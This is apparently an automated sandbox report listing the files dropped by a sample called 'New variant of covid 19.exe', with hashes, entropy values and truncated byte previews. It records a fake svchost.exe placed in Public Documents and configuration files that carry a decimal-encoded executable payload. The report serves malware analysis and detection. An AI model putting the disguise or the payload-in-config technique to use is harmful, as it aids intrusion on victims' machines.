                                                                        Preview: MDMP....... ........dH`...................U...........B.......0......GenuineIntelW...........T............dH`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4840.tmp.WERInternalMetadata.xml
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8484
                                                                        Entropy (8bit):3.6954421801135404
                                                                        Encrypted:false
                                                                        SSDEEP:192:Rrl7r3GLNi066p6YSzSUpAgEDgmfZLS5Cpr589bu6sfV6m:RrlsNiR6p6YGSUpAgEDgmfVSXuZf5
                                                                        MD5:0AF396BB1DD94BFDEE4A70B8FE2F2FF1
                                                                        SHA1:19754582D2D13F5CE3D73F3811BC6673F67CAC0E
                                                                        SHA-256:786C27AC3C18A5A8EFDFB65966CC629FD674854E7D543A52A74E4C9A8A31AFCB
                                                                        SHA-512:F4B2E3CDA93DFEB5384A801B05D2371908DDDB63770C25C100DEFB1655D58020AC8FD3D4CCB856399262F24C9F38486E2C5D00DA8D92FA6D1C3BD9AF97F83772
                                                                        Malicious:false
                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.7.2.<./.P.i.d.>.......
                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER48DD.tmp.xml
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4842
                                                                        Entropy (8bit):4.483864038775725
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwSD8zsyJgtWI98yWSC8B38fm8M4JbuAFFh+q8v9AubDQM7TZKuKe9d:uITfAnTSNGJbumK9FbUM71KuKe9d
                                                                        MD5:9E1149FFB2181D5A290D75B878FCDADF
                                                                        SHA1:B09295AE7E50FEB4B6CB846A23BC5C9FE3E07BC3
                                                                        SHA-256:5D5FB92C86AE78EC248789600BEDDBCA30707AD5CD1F9EF172BAB82781BAE93C
                                                                        SHA-512:C2124A1C9FF8406F448D25DF1CF11AAF492B0CE4472995973BEE548EE3280867C263BE66E2F7BC72528E16A92CF848F50AB0551814B00FD8FF90F0342AE46A4C
                                                                        Malicious:false
                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="895169" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                        C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):45816
                                                                        Entropy (8bit):6.247071799238702
                                                                        Encrypted:false
                                                                        SSDEEP:768:A1+uC50TPNWMtxscrP3v0lH51S+T8rBItHvhZQ96xdfBu2uAHubhK:ApPT1x53vW1TSItPbJL
                                                                        MD5:A489513CA0DE2472E0AD79830DD9AC44
                                                                        SHA1:B767FE686E074F551773F208E1CB756D114E38C4
                                                                        SHA-256:DF12835CD6BC77F9724900D2BF8F0403364CE6E8E81D389F8DC3B2EB8CA42961
                                                                        SHA-512:E5CDDFC3C32AF524AB2CA1CB671034C0D46F1B3D4E83E98FB0FD5AF198FBFBC93651E8381FCDE18F40558994C5F2F76D6A8A6304DD4C7EDC6DE93A2EF912DD5C
                                                                        Malicious:true
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....r..........."...0.................. ........@.. ...................................@.................................L...O.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H.......d;...v......S....................................................*".(<....*>..r4#.p.o@....*".(A....*Vsk...(B...t.........*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*~r.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.0...........r...pr#..p(..........(.....re..p....r{..p....s........r
                                                                        C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe:Zone.Identifier
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                        Category:dropped
                                                                        Size (bytes):58596
                                                                        Entropy (8bit):7.995478615012125
                                                                        Encrypted:true
                                                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                        MD5:61A03D15CF62612F50B74867090DBE79
                                                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                        Malicious:false
                                                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):3.0997736875329633
                                                                        Encrypted:false
                                                                        SSDEEP:6:kK7QkPkwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:jQskwTJ6HkPlE99SNxAhUe0ht
                                                                        MD5:C0C84513E4F41BE3238884A35D13F1FE
                                                                        SHA1:D491CA0E58BB3E79F3A4426F69664E5A9599BACA
                                                                        SHA-256:34DADEF365AC9B7C7BD80E76F1C46EE6F8E8CF0EAED91EF2837B17C31D201F6D
                                                                        SHA-512:314E1479976E42C4D3B4779D25A7E4B8E344A8590E62CE01BDB18FB3CAB6675A6E1690DEE3F4953959A76C631D25B8FC1BB8C6DE2B100849E8297B776449C6F8
                                                                        Malicious:false
                                                                        Preview: p...... ...........6u...(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                        C:\Users\user\AppData\Local\DdUPmLN_kgoHVaSIjqNjSlvYS\New_variant_of_covid_19.e_Url_0vajnaqbdmy0dt0v3gl1hvcjtehbwrpa\2.792.19.755\tosfmudg.newcfg
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2527795
                                                                        Entropy (8bit):3.0591944636233315
                                                                        Encrypted:false
                                                                        SSDEEP:12288:7O7DUP8gwUeJcfRP31tcKDKYFh14NS+MjQxRURB67WZM4ygmGsnWlET9linK3vv9:iXf/Gbfcj
                                                                        MD5:AB55DB4D124A772294EDE8E9E8288F53
                                                                        SHA1:9E1071D3935F13D04ACD9B29FBD7FF8D857373B1
                                                                        SHA-256:88EC5DC9338D281F17A70DCB770B1B14CE81FDC9D30951CC4B4F96C7819F3D14
                                                                        SHA-512:30374E94FEA125AA05101CD8B77DC5235DF8023FF843DB279726EB1464035DACD65047E3392F12B1AB024235988A1344823B483319F43DCF413F5A184C4A19EE
                                                                        Malicious:false
                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE>.. <setting name="AYhFcoOUTPAsNEJFbVkZa" serializeAs="String">.. <value>77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97
                                                                        C:\Users\user\AppData\Local\DdUPmLN_kgoHVaSIjqNjSlvYS\svchost.exe_Url_0aeimnckxwjoc2ntwml1gvkearlpscly\2.792.19.755\1m4vpdph.newcfg
                                                                        Process:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2527796
                                                                        Entropy (8bit):3.059200695461018
                                                                        Encrypted:false
                                                                        SSDEEP:12288:9O7DUP8gwUeJcfRP31tcKDKYFh14NS+MjQxRURB67WZM4ygmGsnWlET9linK3vv9:UXf/Gbfcj
                                                                        MD5:9E1FF7809698037170AF07A9B1C0E5C5
                                                                        SHA1:C3B4A1C7F0450DA5E0610DB733A42F5AD5A4F40B
                                                                        SHA-256:B06892FBF76511BCD1BB510B226B2736BF9CAEF3CB2788760CF18F60FFBA2224
                                                                        SHA-512:4072ABA69B9EB284A7A32DE26AA28B383F32B98832FF86F645B8B0E0FEE41A2D1DCBF4F9583F0702ACDB54A961A25661666CA9694309FD39572CAF1B21001374
                                                                        Malicious:false
                                                                        Preview: x<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE>.. <setting name="AYhFcoOUTPAsNEJFbVkZa" serializeAs="String">.. <value>77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 9
                                                                        C:\Users\user\AppData\Local\DdUPmLN_kgoHVaSIjqNjSlvYS\svchost.exe_Url_0aeimnckxwjoc2ntwml1gvkearlpscly\2.792.19.755\3tlladac.newcfg
                                                                        Process:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2527795
                                                                        Entropy (8bit):3.0591944636233315
                                                                        Encrypted:false
                                                                        SSDEEP:12288:7O7DUP8gwUeJcfRP31tcKDKYFh14NS+MjQxRURB67WZM4ygmGsnWlET9linK3vv9:iXf/Gbfcj
                                                                        MD5:AB55DB4D124A772294EDE8E9E8288F53
                                                                        SHA1:9E1071D3935F13D04ACD9B29FBD7FF8D857373B1
                                                                        SHA-256:88EC5DC9338D281F17A70DCB770B1B14CE81FDC9D30951CC4B4F96C7819F3D14
                                                                        SHA-512:30374E94FEA125AA05101CD8B77DC5235DF8023FF843DB279726EB1464035DACD65047E3392F12B1AB024235988A1344823B483319F43DCF413F5A184C4A19EE
                                                                        Malicious:false
                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE>.. <setting name="AYhFcoOUTPAsNEJFbVkZa" serializeAs="String">.. <value>77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97
                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
                                                                        Process:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.355304211458859
                                                                        Encrypted:false
                                                                        SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4Kx1qE4KE4x84j:MxHKXwYHKhQnoPtHoxHhAHKzvGHKx1qs
                                                                        MD5:91AB2D220C13261DC89826F3B5F173D0
                                                                        SHA1:503DC61AC5CA2C7B963EA347D0D760980E4AE78F
                                                                        SHA-256:5FB683D310C9E0F8BEDD39A213C8290920450979BAB921CD0A3F0CA31A308E4A
                                                                        SHA-512:C9D6BF543A1BBE7552733779A996189282CF053087FEE646C871A6B7F03EEC70D2DA6A6CF25208FBDD0851963C1275159AD07016B9E713E1B57BB616CDC1F89B
                                                                        Malicious:false
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, Publi
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):14734
                                                                        Entropy (8bit):4.993014478972177
                                                                        Encrypted:false
                                                                        SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                        MD5:8D5E194411E038C060288366D6766D3D
                                                                        SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                        SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                        SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                        Malicious:false
                                                                        Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):21544
                                                                        Entropy (8bit):5.585174318095792
                                                                        Encrypted:false
                                                                        SSDEEP:384:rtL6ojmmTH6mfRYSBKnojul6i8aepEQeZUn1u16zq5maxHVw38gCIvUI++j/:zmmTHs4KoClya+EpC3qUCm/Cly
                                                                        MD5:9CF94556F1F34D114B11C0663625F1DC
                                                                        SHA1:9C63907AA246A612BAA74322D06036DC35686000
                                                                        SHA-256:89F18529703F4229B00160C737E0BEFD33EE1B02B40C94E5038B5F3AE6E4AF0E
                                                                        SHA-512:A52D4CA11B05B520EB6BA25214D49AD1D63B344DDD416BFB9837A92EB85306608CEDF33C49437080D3CD732820CB5201120C537EED79A1195EFF891BEF045326
                                                                        Malicious:false
                                                                        Preview: @...e.........................~.Y...D...D............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)T.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.10987860287095041
                                                                        Encrypted:false
                                                                        SSDEEP:12:26H0sjXm/Ey6q9995/bGq3qQ10nMCldimE8eawHjcyf:26ql68ZXLyMCldzE9BHjci
                                                                        MD5:1F925FCA56A2A3066F00CBA80A43701D
                                                                        SHA1:24720347D9A7D4B86AE847F9B75361A753F25CF6
                                                                        SHA-256:D08F048D6270A50D4EB8DE6FAF75CC700228CF5A4BB40398CD95385035B90918
                                                                        SHA-512:8D64CA6D539C17A558621E69381EB65FF8703FB85B291F7B2C96491DF05D303C9F7DE035525EC90702B0B4C1A6C18EEA78045F538EA1FCF6CB7F79591D36C93B
                                                                        Malicious:false
                                                                        Preview: ................................................................................\................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................7+..... .....v..Ou...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.\...............................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.11254085572117778
                                                                        Encrypted:false
                                                                        SSDEEP:12:IEjXm/Ey6q9995/bR1miM3qQ10nMCldimE8eawHza1miI0UP:ml68Zl1tMLyMCldzE9BHza1tI0E
                                                                        MD5:33003BC4A49F4CF46170C0497FF28A33
                                                                        SHA1:BE8B57158236941F3828B53A4BA5EE6382EB7CF7
                                                                        SHA-256:DD5876166794548F3BE2113E87ABB80345D5C1B79B8B5487F797EC20822E165C
                                                                        SHA-512:0DC4D464F3B5778A03C6C2DBCF846AA5D700ABD77E4F04FDF75E858D65DB3E2DC5E26E56B2946693AEA3534D323B6DBF4329D4D0D89CB7675F1769375C60AF25
                                                                        Malicious:false
                                                                        Preview: ................................................................................\................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................7+..... ........Ou...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.\.......Y.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.11234020995834726
                                                                        Encrypted:false
                                                                        SSDEEP:12:/6jXm/Ey6q9995/b2w1mK2P3qQ10nMCldimE8eawHza1mK1oXP://l68ZD1iPLyMCldzE9BHza1Ru
                                                                        MD5:AEE93FEF49A95DCCA7BE060A2E2EF34D
                                                                        SHA1:C5602954298F8A7DA9254303E520577A0BBAFFFE
                                                                        SHA-256:BA18EFD0525720BCE454D8900C3D996721B1A2489CBC2410CF39BB39123E10B4
                                                                        SHA-512:AC24AD4C059427C8988D0054D4512F4CAE8CE2985FC9D2DE7E6A14F5AE2116C8EDD89DEC4465AC194AA42F7269EF863B2B3FC53422277AE8985121DD9054F96F
                                                                        Malicious:false
                                                                        Preview: ................................................................................\.......Jb.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................7+..... ......s.Ou...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.\.......yi......................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkwequj1.yo0.psm1
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
